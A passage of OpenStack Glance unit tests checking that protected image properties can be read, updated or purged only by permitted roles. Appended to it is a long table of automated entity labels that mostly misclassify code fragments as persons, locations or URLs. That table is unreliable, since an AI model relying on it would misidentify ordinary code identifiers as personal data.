As admin role, create an image with a protected property, and verify
permitted role 'member' can read that protected property via
/images/detail
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
method='GET', path='/images/detail')
headers = {'x-auth-token': 'user:tenant:member'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 200)
res_body = json.loads(output.body)['images'][0]
self.assertEqual(res_body['properties']['x_owner_foo'], 'bar')
def test_prop_protection_with_detail_and_unpermitted_role(self):
"""
As admin role, create an image with a protected property, and verify
        unpermitted role 'fake_role' can *not* read that protected property via
/images/detail
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
method='GET', path='/images/detail')
headers = {'x-auth-token': 'user:tenant:fake_role'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 200)
res_body = json.loads(output.body)['images'][0]
self.assertNotIn('x-image-meta-property-x_owner_foo',
res_body['properties'])
def test_prop_protection_with_update_and_permitted_role(self):
"""
As admin role, create an image with protected property, and verify
permitted role 'member' can update that protected property
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:member',
'x-image-meta-property-x_owner_foo': 'baz'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(res_body['properties']['x_owner_foo'], 'baz')
def test_prop_protection_with_update_and_unpermitted_role(self):
"""
As admin role, create an image with protected property, and verify
unpermitted role 'fake_role' can *not* update that protected property
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:fake_role',
'x-image-meta-property-x_owner_foo': 'baz'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code)
self.assertIn("Property '%s' is protected" %
"x_owner_foo", output.body)
def test_prop_protection_update_without_read(self):
"""
Test protected property cannot be updated without read permission
"""
image_id = self._create_admin_image(
{'x-image-meta-property-spl_update_only_prop': 'foo'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:spl_role',
'x-image-meta-property-spl_update_only_prop': 'bar'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEquals(output.status_int, webob.exc.HTTPForbidden.code)
self.assertIn("Property '%s' is protected" %
"spl_update_only_prop", output.body)
def test_prop_protection_update_noop(self):
"""
Test protected property update is allowed as long as the user has read
access and the value is unchanged
"""
image_id = self._create_admin_image(
{'x-image-meta-property-spl_read_prop': 'foo'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:spl_role',
'x-image-meta-property-spl_read_prop': 'foo'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(res_body['properties']['spl_read_prop'], 'foo')
self.assertEquals(output.status_int, 200)
def test_prop_protection_with_delete_and_permitted_role(self):
"""
As admin role, create an image with protected property, and verify
        permitted role 'member' can delete that protected property
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:member',
'X-Glance-Registry-Purge-Props': 'True'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(res_body['properties'], {})
def test_prop_protection_with_delete_and_unpermitted_read(self):
"""
Test protected property cannot be deleted without read permission
"""
image_id = self._create_admin_image(
{'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:fake_role',
'X-Glance-Registry-Purge-Props': 'True'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEquals(output.status_int, 200)
self.assertNotIn('x-image-meta-property-x_owner_foo', output.headers)
another_request = unit_test_utils.get_fake_request(
method='HEAD', path='/images/%s' % image_id)
headers = {'x-auth-token': 'user:tenant:admin'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 200)
self.assertEqual('', output.body)
self.assertEqual(output.headers['x-image-meta-property-x_owner_foo'],
'bar')
def test_prop_protection_with_delete_and_unpermitted_delete(self):
"""
Test protected property cannot be deleted without delete permission
"""
image_id = self._create_admin_image(
{'x-image-meta-property-spl_update_prop': 'foo'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:spl_role',
'X-Glance-Registry-Purge-Props': 'True'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEquals(output.status_int, 403)
self.assertIn("Property '%s' is protected" %
"spl_update_prop", output.body)
another_request = unit_test_utils.get_fake_request(
method='HEAD', path='/images/%s' % image_id)
headers = {'x-auth-token': 'user:tenant:admin'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 200)
self.assertEqual('', output.body)
self.assertEqual(
output.headers['x-image-meta-property-spl_update_prop'], 'foo')
def test_read_protected_props_leak_with_update(self):
"""
        Verify that properties we lack read permission for are not
        disclosed when updating other properties
"""
image_id = self._create_admin_image(
{'x-image-meta-property-spl_update_prop': '0',
'x-image-meta-property-foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:spl_role',
'x-image-meta-property-spl_update_prop': '1',
'X-Glance-Registry-Purge-Props': 'False'}
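        # Purge-Props False keeps unspecified properties server-side, but
        # ones the caller cannot read must not be echoed back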
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(res_body['properties']['spl_update_prop'], '1')
self.assertNotIn('foo', res_body['properties'])
def test_update_protected_props_mix_no_read(self):
"""
Create an image with two props - one only readable by admin, and one
        readable/updatable by member. Verify member can successfully update
their property while the admin owned one is ignored transparently
"""
image_id = self._create_admin_image(
{'x-image-meta-property-admin_foo': 'bar',
'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:member',
'x-image-meta-property-x_owner_foo': 'baz'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(res_body['properties']['x_owner_foo'], 'baz')
self.assertNotIn('admin_foo', res_body['properties'])
def test_update_protected_props_mix_read(self):
"""
Create an image with two props - one readable/updatable by admin, but
also readable by spl_role. The other is readable/updatable by
spl_role. Verify spl_role can successfully update their property but
not the admin owned one
"""
custom_props = {
'x-image-meta-property-spl_read_only_prop': '1',
'x-image-meta-property-spl_update_prop': '2'
}
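        # spl_role may read both properties but update only
        # spl_update_prop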
image_id = self._create_admin_image(custom_props)
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
        # verify spl_role can update its own prop
headers = {'x-auth-token': 'user:tenant:spl_role',
'x-image-meta-property-spl_read_only_prop': '1',
'x-image-meta-property-spl_update_prop': '1'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertEqual(output.status_int, 200)
self.assertEqual(res_body['properties']['spl_read_only_prop'], '1')
self.assertEqual(res_body['properties']['spl_update_prop'], '1')
# verify spl_role can not update admin controlled prop
headers = {'x-auth-token': 'user:tenant:spl_role',
'x-image-meta-property-spl_read_only_prop': '2',
'x-image-meta-property-spl_update_prop': '1'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 403)
def test_delete_protected_props_mix_no_read(self):
"""
Create an image with two props - one only readable by admin, and one
        readable/deletable by member. Verify member can successfully delete
their property while the admin owned one is ignored transparently
"""
image_id = self._create_admin_image(
{'x-image-meta-property-admin_foo': 'bar',
'x-image-meta-property-x_owner_foo': 'bar'})
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:member',
'X-Glance-Registry-Purge-Props': 'True'}
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
res_body = json.loads(output.body)['image']
self.assertNotIn('x_owner_foo', res_body['properties'])
self.assertNotIn('admin_foo', res_body['properties'])
def test_delete_protected_props_mix_read(self):
"""
Create an image with two props - one readable/deletable by admin, but
also readable by spl_role. The other is readable/deletable by
        spl_role. Verify spl_role is forbidden to purge props in this
        scenario, since that would also drop the prop it can read but
        not delete.
"""
custom_props = {
'x-image-meta-property-spl_read_only_prop': '1',
'x-image-meta-property-spl_delete_prop': '2'
}
image_id = self._create_admin_image(custom_props)
another_request = unit_test_utils.get_fake_request(
path='/images/%s' % image_id, method='PUT')
headers = {'x-auth-token': 'user:tenant:spl_role',
'X-Glance-Registry-Purge-Props': 'True'}
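        # purging would also drop spl_read_only_prop, which spl_role can
        # read but not delete, so the request is refused outright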
for k, v in headers.iteritems():
another_request.headers[k] = v
output = another_request.get_response(self.api)
self.assertEqual(output.status_int, 403)
| 119,145 | [['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['DATE_TIME', '2010-2011'], ['PERSON', 'glance.db.sqlalchemy'], ['PERSON', 'db_api'], ['PERSON', 'glance.db.sqlalchemy'], ['PERSON', 'CONF\n\n_'], ['PERSON', 'TestGlanceAPI(base'], ['PERSON', 'FIXTURES'], ['PERSON', 'FIXTURES'], ['LOCATION', 'self.test_dir'], ['PERSON', 'ari'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['LOCATION', 'res.body'], ['LOCATION', 'res.body'], ['LOCATION', 'res.body'], ['PERSON', 'ari'], ['PERSON', 'ami'], ['LOCATION', 'res.body'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'qcow2'], ['PERSON', 'qcow2'], ['PERSON', 'FIXTURES'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['URL', 'self.co'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['LOCATION', 'Request.blank("/images/%s'], ['URL', 'req.ge'], ['PERSON', 'test_show_non_exists_image(self'], ['NRP', 'memb_list'], ['NRP', 'memb_list'], ['PERSON', 'FakeAuthMiddleware'], ['NRP', 'memb_list'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['DATE_TIME', 'FakeAuthMiddleware(test_router'], ['DATE_TIME', 'FakeAuthMiddleware(test_router'], ['DATE_TIME', 'FakeAuthMiddleware(test_router'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'api = test_utils'], ['DATE_TIME', 'FakeAuthMiddleware(test_router'], ['PERSON', 'api = test_utils'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'FakeAuthMiddleware'], ['PERSON', 'ImageSerializer'], ['PERSON', '678911234'], ['PERSON', 'marche'], ['PERSON', 'FIXTURE'], ['PERSON', 'FIXTURE'], ['PERSON', 'FIXTURE'], ['DATE_TIME', '19'], ['DATE_TIME', '19'], ['PERSON', 'copy_image_meta = copy.deepcopy(image_meta'], ['PERSON', 'copy_image_meta = copy.deepcopy(image_meta'], ['LOCATION', 'TestFilterValidator(base'], ['LOCATION', 'TestAPIProtectedProps(base'], ['PERSON', 'ami'], ['PERSON', 'ami'], ['PERSON', 'output.body'], ['PERSON', 'output.body'], ['PERSON', 'output.body'], ['PERSON', 'output.body'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['URL', "http://example.com/image.tar.gz',"], ['URL', "http://example.com/image.tar.gz',"], ['URL', "http://example.com/images/123'"], ['URL', "http://glance.com/i.ovf',"], ['URL', "http://glance.com/i.ovf',"], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'oslo.co'], ['URL', 'glance.api.com'], ['URL', 'glance.com'], ['URL', 'glance.common.co'], ['URL', 'glance.co'], ['URL', 'glance.openstack.com'], ['URL', 'glance.openstack.com'], ['URL', 'glance.store.fi'], ['URL', 'cfg.CO'], ['URL', 'uuidutils.ge'], ['URL', 'base.Is'], ['URL', 'self.ma'], ['URL', 'routes.Ma'], ['URL', 'self.ma'], ['URL', 'self.FI'], ['URL', 'self.co'], ['URL', 'glance.context.Re'], ['URL', 'api.se'], ['URL', 'api.ge'], ['URL', 'self.de'], ['URL', 'self.cr'], ['URL', 'self.de'], ['URL', 'self.FI'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'models.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 
'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'res.bo'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'res.bo'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'CONF.im'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'StringIO.St'], ['URL', 'CONF.im'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'CONF.im'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.FI'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], 
['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.stubs.Se'], ['URL', 'glance.api.v1.im'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'missing.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'six.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'missing.re'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.co'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 
'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'CONF.im'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'CONF.im'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'StringIO.St'], ['URL', 'CONF.im'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.bo'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'headers.it'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'webob.Re'], ['URL', 'req.me'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'timeutils.is'], ['URL', 'dt1.st'], ['URL', 'dt1.st'], ['URL', 'dt1.st'], ['URL', 'timeutils.is'], ['URL', 'ts.st'], ['URL', 'ts.st'], ['URL', 'timeutils.is'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'api.im'], ['URL', 'self.co'], ['URL', 'api.im'], ['URL', 
'self.co'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'res.bo'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'detail.xxx'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'images.xxx'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'webob.Re'], ['URL', 'members.xxx'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.ge'], ['URL', 'self.as'], ['URL', 'res.st'], ['URL', 'self.se'], ['URL', 'webob.Re'], ['URL', 'req.ge'], 